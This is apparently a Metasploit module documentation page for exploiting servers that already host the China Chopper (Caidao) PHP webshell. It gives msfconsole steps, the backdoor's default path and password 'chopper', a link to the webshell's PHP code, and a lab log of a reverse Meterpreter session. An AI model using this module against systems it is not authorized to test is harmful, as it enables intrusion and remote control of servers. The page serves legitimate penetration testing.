/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md
Markdown | 44 lines | 31 code | 13 blank | 0 comment | 0 complexity | 7ec8f02c1d4c8fb820d4c57565901fe4 MD5 | raw file
Possible License(s): BSD-3-Clause, Apache-2.0, GPL-3.0, GPL-2.0
- China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
- ## Vulnerable Application
- Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
- ## Verification Steps
- 1. Install the application
- 2. Start msfconsole
- 3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
- 4. Do: `set rport port`
- 5. Do: `set rhost ip`
- 6. Do: `check`
- ```
- [+] 192.168.1.103:80 - The target is vulnerable.
- ```
- 8. Do: `exploit`
- 9. You should get a shell.
- ## Options
- **TARGETURI**
- TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
-
- **PASSWORD**
-
- PASSWORD by default is `chopper`, which is the password of the backdoor.
- ## Demonstration
- ```
- msf exploit(caidao_php_backdoor_exec) > exploit
- [*] Started reverse handler on 192.168.1.108:4444
- [*] Sending stage (33068 bytes) to 192.168.1.103
- [*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
- meterpreter > sysinfo
- Computer : kali
- OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
- Meterpreter : php/php
- ```